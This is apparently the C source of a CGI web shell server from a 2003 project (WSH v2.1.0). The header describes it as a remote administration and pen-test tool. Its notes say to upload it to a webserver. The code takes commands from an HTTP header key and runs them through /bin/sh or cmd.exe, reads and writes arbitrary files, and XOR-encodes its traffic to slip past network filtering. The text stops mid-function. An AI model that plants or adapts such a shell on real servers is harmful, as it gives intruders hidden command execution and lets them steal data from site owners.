wsh-s.c

Wsh, "Web Shell" - 远程控制UNIX/WIN SHELL

/*******************************************************************************
** Wsh-s.c - WebShell Server C version - v1.0                                 **
** Copyright (C) 2003 Simon Castro - <scastro [at] entreelibre.com>           **
**                                                                            **
**   This file is part of WSH v2.1.0 - WebShell v2.1.0 - (C) Alex Dyatlov and **
** Simon Castro - and is a project of the Gray-World  Team  (http://www.gray- **
** world.net / <team [at] gray-world.net>).                                   **
**                                                                            **
**   Wsh-s.c is free software; you can redistribute it and/or modify it under **
** the terms of the GNU General Public  License  as  published  by  the  Free **
** Software Foundation; either version 2 of the License, or (at your  option) **
** any later version.                                                         **
**                                                                            **
**   Wsh-s.c is distributed in the hope that it will be useful,  but  WITHOUT **
** ANY WARRANTY; without even the  implied  warranty  of  MERCHANTABILITY  or **
** FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public  License  for **
** more details.                                                              **
**                                                                            **
**   You should have received a copy of the GNU General Public License  along **
** with this file; if not, write to the Free Software  Foundation,  Inc.,  59 **
** Temple Place, Suite 330, Boston, MA 02111-1307 USA                         **
*******************************************************************************/

/*******************************************************************************
**                            COMPILATION INFOS                               **
**                                                                            **
**   # Under *Nix (Debian 3.0 && OpenBSD 3.3): gcc -g2 -Wall -o wsh-s wsh-s.c **
**   # Under Win32 (Visual C++)              : cl /W3 wsh-s.c ws2_32.lib      **
**   # Under Win32 (Cygwin)                  : Set WIN32_RUN and gcc ...      **
*******************************************************************************/

/*******************************************************************************
**                                 KNOWN BUGS                                 **
**                                                                            **
**  B1/ Some INVERT values may corrupt exec or file data streams.             **
*******************************************************************************/

/*******************************************************************************
**                  LESS OR MORE USUAL WAYS TO USE WEBSHELL                   **
**                                                                            **
**  # As a standalone CGI : Just build it and upload it on the Webserver      **
**  # As an 'internal' CGI : Just  move  main()  to  another  function  name, **
**    change the clean_exit() exit() call to a return()  call  and  add  this **
**    piece of code into another CGI source code - Take care  to  manage  the **
**    stdin input stream.                                                     **
**  # For a  remote way to administrate a webserver.                          **
**  # For a remote pen-test  if  you  want  shell  and  file  upload/download **
**    support on the server side and are concerned by NACS restrictions.      **
*******************************************************************************/

/*******************************************************************************
**                           BEGIN WSH CONFIGURATION                          **
*******************************************************************************/

#define KEY "KEY"	/* The identification key */
#define ENCODE 1	/* Xor with INVERT (1) ? or cleartext (0) */
#define INVERT 85	/* Xor value */
#define WIN32_RUN 0	/* CygWin Build only : Runs on Win32 ? 1 : 0 */

/* Locations of shell to execute commands */
#define PATH_TO_SHELL "/bin/sh"
#define SHELL_ARGS "-c"
#define W32_PATH_TO_SHELL "c:\\winnt\\system32\\cmd.exe"
#define W32_SHELL_ARGS "/C"

/*******************************************************************************
**              YOU DON'T HAVE TO CHANGE ANYTHING BELOW THIS LINE             **
*******************************************************************************/

/*******************************************************************************
**                           INCLUDES, DEFINES, ETC...                        **
*******************************************************************************/

/* Standard includes */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <ctype.h>

/* For the Visual C++ Win32 compilation */
#if defined(__WIN32__) || defined(WIN32) || defined(_WIN32)
  #include <process.h>
  #include <io.h>
  #include <winsock2.h>
#else /* *Nix compilers and Cygwin */
  #include <unistd.h>
  /* For the wait3 call */
  #define _USE_BSD
  #include <sys/resource.h>
  #include <sys/wait.h>
#endif

/* Internal variables */
#define TMP_BUF_SIZE 512
#define CMDLINE_SIZE 512

/* HTTP header values we're using in the WSH protocol */
#define ENV_X_KEY "HTTP_X_KEY"
#define ENV_X_FILEGET "HTTP_X_FILEGET"
#define ENV_X_FILEPUT "HTTP_X_FILEPUT"
#define ENV_CONTENT_LENGTH "CONTENT_LENGTH"

/* Communicating between CGI and webserver */
#define CGI_STDOUT_STR "Content-Type: text/html\r\n\r\n"

/* Used by the Win32_WSH_exec() function and not by the exec_command() one */
#define EXEC_WAITING_MSECS 10000 // 10 secs...

/*******************************************************************************
**                            LET'S READ THAT CODE                            **
*******************************************************************************/

/* If you wanna return a fake cgi message, then add it here ? */

void clean_exit(void)
{
  exit (-1);
}

/* Send data to the client for the exec || wshget modes */

int send_data(char *buffer,int length)
{
  int nw;

  /* We're in encoding mode */
  if (ENCODE == 1)
    for (nw=0;nw<length;nw++)
      buffer[nw] = buffer[nw] ^ INVERT;

  nw = write(1,buffer,length);
  return (nw);
}

/* Write data to local file : wshput mode */

int write_to_file(char *buffer, int size, FILE *target_stream)
{
  int cpt;

  /* We're in encoding mode */
  if (ENCODE == 1)
    for (cpt=0;cpt<size;cpt++)
      buffer[cpt] = buffer[cpt] ^ INVERT;

  return(fwrite(buffer,size,1,target_stream));
}

/* As the name suggests ... */

int wshget_mode(char *filename)
{
  FILE *get_from_stream;
  int nbytes,cpt;
  char tmp_buf[TMP_BUF_SIZE+1];

  if ((get_from_stream = fopen(filename,"rb")))
    {
      fseek(get_from_stream,0,SEEK_END);
      nbytes = ftell(get_from_stream);
      if (nbytes > 0)
	{
	  fseek(get_from_stream,0,SEEK_SET);
	  for (cpt=0;cpt<nbytes;)
	    {
	      memset(tmp_buf,0,TMP_BUF_SIZE+1);
	      if (nbytes > cpt+TMP_BUF_SIZE)
		{
		  fread(tmp_buf,TMP_BUF_SIZE,1,get_from_stream);
		  cpt += TMP_BUF_SIZE;
		  send_data(tmp_buf,TMP_BUF_SIZE);
		}
	      else
		{
		  fread(tmp_buf,nbytes-cpt,1,get_from_stream);
		  send_data(tmp_buf,nbytes-cpt);
		  cpt = nbytes;
		}
	    }
	}
      fclose (get_from_stream);
      return(1);
    }
  return(-1);
}

/* As the name suggests ... */

int wshput_mode(char *filename,int cl)
{
#if !defined(__WIN32__) && !defined(WIN32) && !defined(_WIN32)
  /* Stdin management */
  int ret_select;
  fd_set  fdr_select;
#endif
  /* File management */
  FILE *put_to_stream;
  int cpt,check;
  char tmp_buf[TMP_BUF_SIZE+1];

/* Won't work if builded with visual C++ */
#if !defined(__WIN32__) && !defined(WIN32) && !defined(_WIN32)
  /* Check Stdin will give us something */
  FD_ZERO(&(fdr_select));
  FD_SET(0,&(fdr_select));
  if ((ret_select = select (1,&(fdr_select),NULL,NULL,0)) < 0)
    clean_exit();
#endif

  if ((put_to_stream = fopen(filename,"wb")))
    {
      for (cpt=0;cpt<cl;)
	{
	  memset(tmp_buf,0,TMP_BUF_SIZE+1);
	  if (cl > cpt+TMP_BUF_SIZE)
	    {
	      if ((check = read(0,tmp_buf,TMP_BUF_SIZE)) != -1)
		cpt += check;
	      else
		clean_exit();
	      if ((write_to_file(tmp_buf,TMP_BUF_SIZE,put_to_stream)) != 1)
		clean_exit();
	    }
	  else
	    {
	      if ((read(0,tmp_buf,cl-cpt)) == -1)
		clean_exit();
	      if ((write_to_file(tmp_buf,cl-cpt,put_to_stream)) != 1)
		clean_exit();
	      cpt = cl;
	    }
	}
      fclose(put_to_stream);
      return(1);
    }
  return (-1);
}

/* As the name suggests ... */

#if defined(__WIN32__) || defined(WIN32) || defined(_WIN32)
int Win32_WSH_exec(int cl)
{
  /* Infos for the exec */
  STARTUPINFO start_info;
  SECURITY_ATTRIBUTES sec_att; 
  PROCESS_INFORMATION process_info;
  // This one only (?) 
  // Possible to use another shell while building with C++ ?!?
  char *cmd=W32_PATH_TO_SHELL;
  /* Infos for the pipe */